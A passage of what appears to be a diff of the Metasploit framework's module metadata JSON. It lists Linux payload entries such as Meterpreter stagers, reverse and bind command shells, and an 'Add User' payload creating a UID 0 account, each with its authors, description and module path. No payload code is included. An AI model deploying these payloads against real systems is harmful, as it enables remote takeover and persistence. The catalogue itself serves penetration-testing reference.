"Inject the mettle server payload (staged).\n\nListen for a connection", - "references": [], - "platform": "Linux,Linux", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": 
"/modules/payloads/stagers/linux/x64/bind_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x64/meterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/x64/meterpreter", - "stager_refname": "linux/x64/bind_tcp" - }, - "payload_linux/x64/meterpreter/reverse_sctp": { - "name": "Linux Mettle x64, Reverse SCTP Stager", - "fullname": "payload/linux/x64/meterpreter/reverse_sctp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brent Cook ", - "RageLtMan " - ], - "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux,Linux", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-12-20 04:15:41 +0000", - "path": "/modules/payloads/stagers/linux/x64/reverse_sctp.rb", - "is_install_path": true, - "ref_name": "linux/x64/meterpreter/reverse_sctp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/x64/meterpreter", - "stager_refname": "linux/x64/reverse_sctp" - }, - "payload_linux/x64/meterpreter/reverse_tcp": { - "name": "Linux Mettle x64, Reverse TCP Stager", - "fullname": "payload/linux/x64/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brent Cook ", - "ricky", - "tkmru" - ], - "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux,Linux", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - 
"path": "/modules/payloads/stagers/linux/x64/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x64/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/x64/meterpreter", - "stager_refname": "linux/x64/reverse_tcp" - }, - "payload_linux/x64/meterpreter_reverse_http": { - "name": "Linux Meterpreter, Reverse HTTP Inline", - "fullname": "payload/linux/x64/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb", - "is_install_path": true, - "ref_name": "linux/x64/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x64/meterpreter_reverse_https": { - "name": "Linux Meterpreter, Reverse HTTPS Inline", - "fullname": "payload/linux/x64/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb", - 
"is_install_path": true, - "ref_name": "linux/x64/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x64/meterpreter_reverse_tcp": { - "name": "Linux Meterpreter, Reverse TCP Inline", - "fullname": "payload/linux/x64/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x64/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x64/pingback_bind_tcp": { - "name": "Linux x64 Pingback, Bind TCP Inline", - "fullname": "payload/linux/x64/pingback_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7" - ], - "description": "Accept a connection from attacker and report UUID (Linux x64)", - "references": [], - "platform": "Linux", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x64/pingback_bind_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x64/pingback_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - 
"payload_type": 1, - "staged": false - }, - "payload_linux/x64/pingback_reverse_tcp": { - "name": "Linux x64 Pingback, Reverse TCP Inline", - "fullname": "payload/linux/x64/pingback_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7" - ], - "description": "Connect back to attacker and report UUID (Linux x64)", - "references": [], - "platform": "Linux", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x64/pingback_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x64/pingback_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x64/shell/bind_tcp": { - "name": "Linux Command Shell, Bind TCP Stager", - "fullname": "payload/linux/x64/shell/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ricky" - ], - "description": "Spawn a command shell (staged).\n\nListen for a connection", - "references": [], - "platform": "Linux", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/x64/bind_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x64/shell/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/x64/shell", - "stager_refname": "linux/x64/bind_tcp" - }, - "payload_linux/x64/shell/reverse_sctp": { - "name": "Linux Command Shell, Reverse SCTP Stager", - "fullname": "payload/linux/x64/shell/reverse_sctp", - "aliases": [], - 
"rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ricky", - "RageLtMan " - ], - "description": "Spawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-12-20 04:15:41 +0000", - "path": "/modules/payloads/stagers/linux/x64/reverse_sctp.rb", - "is_install_path": true, - "ref_name": "linux/x64/shell/reverse_sctp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/x64/shell", - "stager_refname": "linux/x64/reverse_sctp" - }, - "payload_linux/x64/shell/reverse_tcp": { - "name": "Linux Command Shell, Reverse TCP Stager", - "fullname": "payload/linux/x64/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ricky", - "tkmru" - ], - "description": "Spawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/x64/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x64/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/x64/shell", - "stager_refname": "linux/x64/reverse_tcp" - }, - "payload_linux/x64/shell_bind_ipv6_tcp": { - "name": "Linux x64 Command Shell, Bind TCP Inline (IPv6)", - "fullname": "payload/linux/x64/shell_bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - 
"epi " - ], - "description": "Listen for an IPv6 connection and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x64/shell_bind_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x64/shell_bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x64/shell_bind_tcp": { - "name": "Linux Command Shell, Bind TCP Inline", - "fullname": "payload/linux/x64/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ricky" - ], - "description": "Listen for a connection and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x64/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x64/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x64/shell_bind_tcp_random_port": { - "name": "Linux Command Shell, Bind TCP Random Port Inline", - "fullname": "payload/linux/x64/shell_bind_tcp_random_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Geyslan G. 
Bem " - ], - "description": "Listen for a connection in a random port and spawn a command shell.\n Use nmap to discover the open port: 'nmap -sS target -p-'.", - "references": [ - "URL-https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port_x86_64.asm" - ], - "platform": "Linux", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb", - "is_install_path": true, - "ref_name": "linux/x64/shell_bind_tcp_random_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x64/shell_find_port": { - "name": "Linux Command Shell, Find Port Inline", - "fullname": "payload/linux/x64/shell_find_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "mak" - ], - "description": "Spawn a shell on an established connection", - "references": [], - "platform": "Linux", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x64/shell_find_port.rb", - "is_install_path": true, - "ref_name": "linux/x64/shell_find_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x64/shell_reverse_ipv6_tcp": { - "name": "Linux x64 Command Shell, Reverse TCP Inline (IPv6)", - "fullname": "payload/linux/x64/shell_reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "epi " - ], - "description": "Connect back to attacker and spawn a command shell over 
IPv6", - "references": [], - "platform": "Linux", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x64/shell_reverse_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x64/shell_reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x64/shell_reverse_tcp": { - "name": "Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/linux/x64/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ricky" - ], - "description": "Connect back to attacker and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x64/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x86/adduser": { - "name": "Linux Add User", - "fullname": "payload/linux/x86/adduser", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "vlad902 ", - "spoonm " - ], - "description": "Create a new user with UID 0", - "references": [], - "platform": "Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x86/adduser.rb", - "is_install_path": true, - "ref_name": "linux/x86/adduser", 
- "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x86/chmod": { - "name": "Linux Chmod", - "fullname": "payload/linux/x86/chmod", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "kris katterjohn " - ], - "description": "Runs chmod on specified file with specified mode", - "references": [], - "platform": "Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x86/chmod.rb", - "is_install_path": true, - "ref_name": "linux/x86/chmod", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x86/exec": { - "name": "Linux Execute Command", - "fullname": "payload/linux/x86/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 ", - "Geyslan G. 
Bem " - ], - "description": "Execute an arbitrary command or just a /bin/sh shell", - "references": [ - "URL-https://github.com/geyslan/SLAE/blob/master/4th.assignment/tiny_execve_sh.asm", - "URL-https://github.com/geyslan/SLAE/blob/master/improvements/x86_execve_dyn.asm" - ], - "platform": "Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x86/exec.rb", - "is_install_path": true, - "ref_name": "linux/x86/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x86/meterpreter/bind_ipv6_tcp": { - "name": "Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)", - "fullname": "payload/linux/x86/meterpreter/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "William Webb ", - "kris katterjohn ", - "egypt " - ], - "description": "Inject the mettle server payload (staged).\n\nListen for an IPv6 connection (Linux x86)", - "references": [], - "platform": "Linux,Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x86/meterpreter/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/bind_ipv6_tcp" - }, - "payload_linux/x86/meterpreter/bind_ipv6_tcp_uuid": { - "name": "Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)", - "fullname": 
"payload/linux/x86/meterpreter/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "William Webb ", - "kris katterjohn ", - "egypt ", - "OJ Reeves" - ], - "description": "Inject the mettle server payload (staged).\n\nListen for an IPv6 connection with UUID Support (Linux x86)", - "references": [], - "platform": "Linux,Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "linux/x86/meterpreter/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/bind_ipv6_tcp_uuid" - }, - "payload_linux/x86/meterpreter/bind_nonx_tcp": { - "name": "Linux Mettle x86, Bind TCP Stager", - "fullname": "payload/linux/x86/meterpreter/bind_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "William Webb ", - "skape " - ], - "description": "Inject the mettle server payload (staged).\n\nListen for a connection", - "references": [], - "platform": "Linux,Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x86/meterpreter/bind_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/bind_nonx_tcp" - }, - 
"payload_linux/x86/meterpreter/bind_tcp": { - "name": "Linux Mettle x86, Bind TCP Stager (Linux x86)", - "fullname": "payload/linux/x86/meterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "William Webb ", - "skape ", - "egypt " - ], - "description": "Inject the mettle server payload (staged).\n\nListen for a connection (Linux x86)", - "references": [], - "platform": "Linux,Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/x86/bind_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x86/meterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/bind_tcp" - }, - "payload_linux/x86/meterpreter/bind_tcp_uuid": { - "name": "Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)", - "fullname": "payload/linux/x86/meterpreter/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "William Webb ", - "skape ", - "egypt ", - "OJ Reeves" - ], - "description": "Inject the mettle server payload (staged).\n\nListen for a connection with UUID Support (Linux x86)", - "references": [], - "platform": "Linux,Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "linux/x86/meterpreter/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": 
true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/bind_tcp_uuid" - }, - "payload_linux/x86/meterpreter/find_tag": { - "name": "Linux Mettle x86, Find Tag Stager", - "fullname": "payload/linux/x86/meterpreter/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "William Webb ", - "skape " - ], - "description": "Inject the mettle server payload (staged).\n\nUse an established connection", - "references": [], - "platform": "Linux,Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/x86/find_tag.rb", - "is_install_path": true, - "ref_name": "linux/x86/meterpreter/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/find_tag" - }, - "payload_linux/x86/meterpreter/reverse_ipv6_tcp": { - "name": "Linux Mettle x86, Reverse TCP Stager (IPv6)", - "fullname": "payload/linux/x86/meterpreter/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "William Webb ", - "kris katterjohn " - ], - "description": "Inject the mettle server payload (staged).\n\nConnect back to attacker over IPv6", - "references": [], - "platform": "Linux,Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x86/meterpreter/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - 
"payload_type": 2, - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/reverse_ipv6_tcp" - }, - "payload_linux/x86/meterpreter/reverse_nonx_tcp": { - "name": "Linux Mettle x86, Reverse TCP Stager", - "fullname": "payload/linux/x86/meterpreter/reverse_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "William Webb ", - "skape " - ], - "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux,Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x86/meterpreter/reverse_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/reverse_nonx_tcp" - }, - "payload_linux/x86/meterpreter/reverse_tcp": { - "name": "Linux Mettle x86, Reverse TCP Stager", - "fullname": "payload/linux/x86/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "William Webb ", - "skape ", - "egypt ", - "tkmru" - ], - "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux,Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/x86/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x86/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - 
"session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/reverse_tcp" - }, - "payload_linux/x86/meterpreter/reverse_tcp_uuid": { - "name": "Linux Mettle x86, Reverse TCP Stager", - "fullname": "payload/linux/x86/meterpreter/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "William Webb ", - "skape ", - "egypt ", - "OJ Reeves" - ], - "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux,Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "linux/x86/meterpreter/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/reverse_tcp_uuid" - }, - "payload_linux/x86/meterpreter_reverse_http": { - "name": "Linux Meterpreter, Reverse HTTP Inline", - "fullname": "payload/linux/x86/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb", - "is_install_path": true, - "ref_name": "linux/x86/meterpreter_reverse_http", - "check": false, - 
"post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x86/meterpreter_reverse_https": { - "name": "Linux Meterpreter, Reverse HTTPS Inline", - "fullname": "payload/linux/x86/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb", - "is_install_path": true, - "ref_name": "linux/x86/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x86/meterpreter_reverse_tcp": { - "name": "Linux Meterpreter, Reverse TCP Inline", - "fullname": "payload/linux/x86/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x86/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, 
- "payload_linux/x86/metsvc_bind_tcp": { - "name": "Linux Meterpreter Service, Bind TCP", - "fullname": "payload/linux/x86/metsvc_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Stub payload for interacting with a Meterpreter Service", - "references": [], - "platform": "Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x86/metsvc_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x86/metsvc_reverse_tcp": { - "name": "Linux Meterpreter Service, Reverse TCP Inline", - "fullname": "payload/linux/x86/metsvc_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Stub payload for interacting with a Meterpreter Service", - "references": [], - "platform": "Linux", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x86/metsvc_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x86/read_file": { - "name": "Linux Read File", - "fullname": "payload/linux/x86/read_file", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - 